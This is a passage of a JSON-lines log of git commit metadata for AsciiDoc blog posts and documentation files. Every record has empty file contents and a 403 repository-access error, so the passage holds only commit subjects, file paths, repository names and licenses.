2015-02-12-Eigene-Fehlerseiten-unter-Joomla-or-Error-404.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-12-Eigene-Fehlerseiten-unter-Joomla-or-Error-404.adoc","new_file":"_posts\/2015-02-12-Eigene-Fehlerseiten-unter-Joomla-or-Error-404.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c97c68c2d7ce66d42fb60a5626e749dc7864d6a","subject":"Update 2017-01-19-Bimeyko.adoc","message":"Update 2017-01-19-Bimeyko.adoc","repos":"alick01\/alick01.github.io,alick01\/alick01.github.io,alick01\/alick01.github.io,alick01\/alick01.github.io","old_file":"_posts\/2017-01-19-Bimeyko.adoc","new_file":"_posts\/2017-01-19-Bimeyko.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alick01\/alick01.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d6c21c862c29fe32bb81b8bd5042e6b9467cb03","subject":"Update 2019-02-02-Your-Blog-title.adoc","message":"Update 
2019-02-02-Your-Blog-title.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2019-02-02-Your-Blog-title.adoc","new_file":"_posts\/2019-02-02-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29eddce4b78429724406c76727a83764bef925d4","subject":"y2b create post Samsung Gear S3 Hands On + Liquid Test","message":"y2b create post Samsung Gear S3 Hands On + Liquid Test","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-31-Samsung-Gear-S3-Hands-On--Liquid-Test.adoc","new_file":"_posts\/2016-08-31-Samsung-Gear-S3-Hands-On--Liquid-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfe612c46ededb7f57f3a507e630aaf4d3083510","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"414b307ab329fb675eac2f17acd7d3c262e1abda","subject":"add event","message":"add event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2018\/dutchclojureday.adoc","new_file":"content\/events\/2018\/dutchclojureday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"82c3d90010b1d9f534a5167602810ee63fc7c5f2","subject":"y2b create post iPhone 7 Ready Headphones!","message":"y2b create post iPhone 7 Ready Headphones!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-05-iPhone-7-Ready-Headphones.adoc","new_file":"_posts\/2016-06-05-iPhone-7-Ready-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c18db9b062571c9846e36e081566cc366b9f1a10","subject":"Update 2016-07-22-La-transmission-du-secret.adoc","message":"Update 2016-07-22-La-transmission-du-secret.adoc","repos":"nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty","old_file":"_posts\/2016-07-22-La-transmission-du-secret.adoc","new_file":"_posts\/2016-07-22-La-transmission-du-secret.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolaschaillot\/pechdencouty.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"e6e498494f4f420d8940f79c50e784aa37d3d891","subject":"Add `deps` and `recompact` tools to manual","message":"Add `deps` and `recompact` tools to manual\n\nThe `deps` tool in particular is very useful to know about.","repos":"sgraham\/ninja,ninja-build\/ninja,nicolasdespres\/ninja,bradking\/ninja,Qix-\/ninja,iwadon\/ninja,martine\/ninja,maruel\/ninja,atetubou\/ninja,ndsol\/subninja,ninja-build\/ninja,juntalis\/ninja,lizh06\/ninja,iwadon\/ninja,maruel\/ninja,mydongistiny\/ninja,juntalis\/ninja,sgraham\/ninja,nicolasdespres\/ninja,ndsol\/subninja,nico\/ninja,nico\/ninja,nico\/ninja,lizh06\/ninja,Qix-\/ninja,atetubou\/ninja,mydongistiny\/ninja,iwadon\/ninja,juntalis\/ninja,AoD314\/ninja,AoD314\/ninja,martine\/ninja,maruel\/ninja,fuchsia-mirror\/third_party-ninja,moroten\/ninja,ninja-build\/ninja,bradking\/ninja,fuchsia-mirror\/third_party-ninja,bradking\/ninja,moroten\/ninja,martine\/ninja,lizh06\/ninja,ndsol\/subninja,ndsol\/subninja,Qix-\/ninja,juntalis\/ninja,mydongistiny\/ninja,nico\/ninja,mydongistiny\/ninja,sgraham\/ninja,ninja-build\/ninja,nicolasdespres\/ninja,sgraham\/ninja,moroten\/ninja,iwadon\/ninja,lizh06\/ninja,fuchsia-mirror\/third_party-ninja,martine\/ninja,nicolasdespres\/ninja,atetubou\/ninja,AoD314\/ninja,fuchsia-mirror\/third_party-ninja,maruel\/ninja,Qix-\/ninja,AoD314\/ninja,atetubou\/ninja,moroten\/ninja,bradking\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lizh06\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"254da7b88253c97b25bb6ee0e2d03021a078eb5b","subject":"Create running-agent.adoc","message":"Create running-agent.adoc","repos":"jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/12\/running-agent.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/12\/running-agent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6de27d9440ef4a4454d0533b6d53b878122ac26","subject":"Update 2016-10-02-IT-Week-4.adoc","message":"Update 2016-10-02-IT-Week-4.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-10-02-IT-Week-4.adoc","new_file":"_posts\/2016-10-02-IT-Week-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01f003111e2e532b1e5129d4874b6b8b0535ae23","subject":"Update 2015-02-16-jQuery-Formularfelder-validieren-Die-Eierlegendewollmilchsau-FormValidation.adoc","message":"Update 
2015-02-16-jQuery-Formularfelder-validieren-Die-Eierlegendewollmilchsau-FormValidation.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-16-jQuery-Formularfelder-validieren-Die-Eierlegendewollmilchsau-FormValidation.adoc","new_file":"_posts\/2015-02-16-jQuery-Formularfelder-validieren-Die-Eierlegendewollmilchsau-FormValidation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fde8d72dfb491ac13dfd07ef1557d2fe20d81054","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc669cd68396ba056609c6f28f0e503c6936ecbb","subject":"Update 2015-05-30-Hello-World-my-tech-introduction.adoc","message":"Update 2015-05-30-Hello-World-my-tech-introduction.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World-my-tech-introduction.adoc","new_file":"_posts\/2015-05-30-Hello-World-my-tech-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3ef4a873d69ccd4983dcf7339a39bbf7dc63513","subject":"Update 2008-01-01-OLD-DONT-PUBLISH-Record-Screen-Demos-on-Fedora-Using-the-Command-Line-ffmpeg.adoc","message":"Update 2008-01-01-OLD-DONT-PUBLISH-Record-Screen-Demos-on-Fedora-Using-the-Command-Line-ffmpeg.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2008-01-01-OLD-DONT-PUBLISH-Record-Screen-Demos-on-Fedora-Using-the-Command-Line-ffmpeg.adoc","new_file":"_posts\/2008-01-01-OLD-DONT-PUBLISH-Record-Screen-Demos-on-Fedora-Using-the-Command-Line-ffmpeg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95801fd45a6f5f96acdf1032e008df25cff1e291","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 
2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"299dd2dd7a3745b454100f87228ce6fbf770e093","subject":"Update 2016-12-06-problem-solving-algorithm-basic.adoc","message":"Update 2016-12-06-problem-solving-algorithm-basic.adoc","repos":"qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io","old_file":"_posts\/2016-12-06-problem-solving-algorithm-basic.adoc","new_file":"_posts\/2016-12-06-problem-solving-algorithm-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qeist\/qeist.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb6c77c63fbffbffe9b98c5214a97d1b289d19a3","subject":"Update 2016-04-22-Streamlining-your-Git-Hub-code-review-process-with-Git-Hub-Pull-Request-Builder.adoc","message":"Update 2016-04-22-Streamlining-your-Git-Hub-code-review-process-with-Git-Hub-Pull-Request-Builder.adoc","repos":"yaks-all-the-way-down\/hubpress.github.io,yaks-all-the-way-down\/hubpress.github.io,yaks-all-the-way-down\/hubpress.github.io,yaks-all-the-way-down\/hubpress.github.io","old_file":"_posts\/2016-04-22-Streamlining-your-Git-Hub-code-review-process-with-Git-Hub-Pull-Request-Builder.adoc","new_file":"_posts\/2016-04-22-Streamlining-your-Git-Hub-code-review-process-with-Git-Hub-Pull-Request-Builder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yaks-all-the-way-down\/hubpress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d1c747e7ea2ee8c4d17380020926182af3e6b43","subject":"Update 2017-05-28-Java-Naming-Conventions.adoc","message":"Update 2017-05-28-Java-Naming-Conventions.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-28-Java-Naming-Conventions.adoc","new_file":"_posts\/2017-05-28-Java-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"409da09a81e569e1d4be993d5045f85364a0df89","subject":"[DOCS] Re-adds custom realm","message":"[DOCS] Re-adds custom 
realm\n","repos":"gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch","old_file":"x-pack\/docs\/en\/security\/authentication\/custom-realm.asciidoc","new_file":"x-pack\/docs\/en\/security\/authentication\/custom-realm.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e9e5f58c5711a684194bb6817452a881cd29805c","subject":"y2b create post iPhone 7 Plus - Hands On With Prototype!","message":"y2b create post iPhone 7 Plus - Hands On With Prototype!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-03-iPhone-7-Plus--Hands-On-With-Prototype.adoc","new_file":"_posts\/2016-08-03-iPhone-7-Plus--Hands-On-With-Prototype.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d67480ff07e4b198339707167fcc04e8debc8dc","subject":"Update 2018-01-28-Having-fun-contributing-to-open-source.adoc","message":"Update 2018-01-28-Having-fun-contributing-to-open-source.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-01-28-Having-fun-contributing-to-open-source.adoc","new_file":"_posts\/2018-01-28-Having-fun-contributing-to-open-source.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f75ec9054ceef2e91aaf9e8bf5cae3b4c5e8b63","subject":"MySQL JSON support blog post","message":"MySQL JSON support blog post\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2016-10-19-Support-for-MySQL-JSON-typpe-coming-soon.adoc","new_file":"blog\/2016-10-19-Support-for-MySQL-JSON-typpe-coming-soon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"081755157d30c0cc7342ee64ddaf41ff12de92d6","subject":"y2b create post Sega Dreamcast Unboxing - Almost Cried","message":"y2b create post Sega Dreamcast Unboxing - Almost Cried","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-03-30-Sega-Dreamcast-Unboxing--Almost-Cried.adoc","new_file":"_posts\/2015-03-30-Sega-Dreamcast-Unboxing--Almost-Cried.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b72eca229c88149d45221ba914e1390eb2756fe2","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03d989c77de3de48ad388bd18e75f286f4dbb42e","subject":"Update 2012-07-30-corriger-les-proprietes-des-revisions-SVN.adoc","message":"Update 2012-07-30-corriger-les-proprietes-des-revisions-SVN.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2012-07-30-corriger-les-proprietes-des-revisions-SVN.adoc","new_file":"_posts\/2012-07-30-corriger-les-proprietes-des-revisions-SVN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ab975ea9487c395ed0efa7346003239a94f0cea","subject":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","message":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7ed1b0530f499dcb2de271c270bc56c619b415e","subject":"y2b create post Gamepad Controller for Razer Edge Unboxing \\u0026 Demo + Razer Edge Docking Station","message":"y2b create post Gamepad Controller for Razer Edge Unboxing \\u0026 Demo + Razer Edge Docking 
Station","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-16-Gamepad-Controller-for-Razer-Edge-Unboxing-u0026-Demo--Razer-Edge-Docking-Station.adoc","new_file":"_posts\/2013-04-16-Gamepad-Controller-for-Razer-Edge-Unboxing-u0026-Demo--Razer-Edge-Docking-Station.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee7e96cb0934770d1b9645fdfa852361ebc3baef","subject":"y2b create post FAKE APPLE WATCH","message":"y2b create post FAKE APPLE WATCH","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-02-06-FAKE-APPLE-WATCH.adoc","new_file":"_posts\/2015-02-06-FAKE-APPLE-WATCH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c774fddfbfe80eac65c19139b559aaf9224fc33a","subject":"Update 2017-04-07-Primi-giorni-al-Castello-Alcuni-incontri.adoc","message":"Update 2017-04-07-Primi-giorni-al-Castello-Alcuni-incontri.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-07-Primi-giorni-al-Castello-Alcuni-incontri.adoc","new_file":"_posts\/2017-04-07-Primi-giorni-al-Castello-Alcuni-incontri.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f5da4484b9aa884aea9ce124db0be81c0ba12a0","subject":"y2b create post MacBook Air 2012 Review (13\\","message":"y2b create post MacBook Air 2012 Review (13\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-06-15-MacBook-Air-2012-Review-13.adoc","new_file":"_posts\/2012-06-15-MacBook-Air-2012-Review-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b24d75cc82e0f7e97e05aac1dd30c28bd5a35b60","subject":"Update 2015-09-22-Initialization-and-Cleanup.adoc","message":"Update 2015-09-22-Initialization-and-Cleanup.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-22-Initialization-and-Cleanup.adoc","new_file":"_posts\/2015-09-22-Initialization-and-Cleanup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be3d8ac40c6e083cdb78d061a2e9e1e8029ef0f5","subject":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","message":"Update 
2016-04-01-A-quien-le-interese-Semana-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c778e038b9eb5217754016960879d2146b4e2bf1","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03819063833ceb3dc0e9e1f2bc430d5b454b0146","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a87037d4ecc82f43c2f154dcfb114d25cc6171a5","subject":"Update 2017-12-21-Lighting-Test-for-the-Select-Master-Degree.adoc","message":"Update 2017-12-21-Lighting-Test-for-the-Select-Master-Degree.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-12-21-Lighting-Test-for-the-Select-Master-Degree.adoc","new_file":"_posts\/2017-12-21-Lighting-Test-for-the-Select-Master-Degree.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2d1f120aa5b5ce50441bb849ffcabe516babd5b","subject":"Update 2015-09-25-Back-to-Basic.adoc","message":"Update 2015-09-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"756cb4c49572d84dcd2db10da78470271a753a29","subject":"Update 2017-02-07-docker-compose-best-practices-part-2.adoc","message":"Update 2017-02-07-docker-compose-best-practices-part-2.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-docker-compose-best-practices-part-2.adoc","new_file":"_posts\/2017-02-07-docker-compose-best-practices-part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68be09dfe622fa296c3cee4fde0773d8c644651c","subject":"y2b create post The Unboxing Time Machine - Nintendo 64","message":"y2b create post The Unboxing Time Machine - Nintendo 64","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-24-The-Unboxing-Time-Machine--Nintendo-64.adoc","new_file":"_posts\/2016-11-24-The-Unboxing-Time-Machine--Nintendo-64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 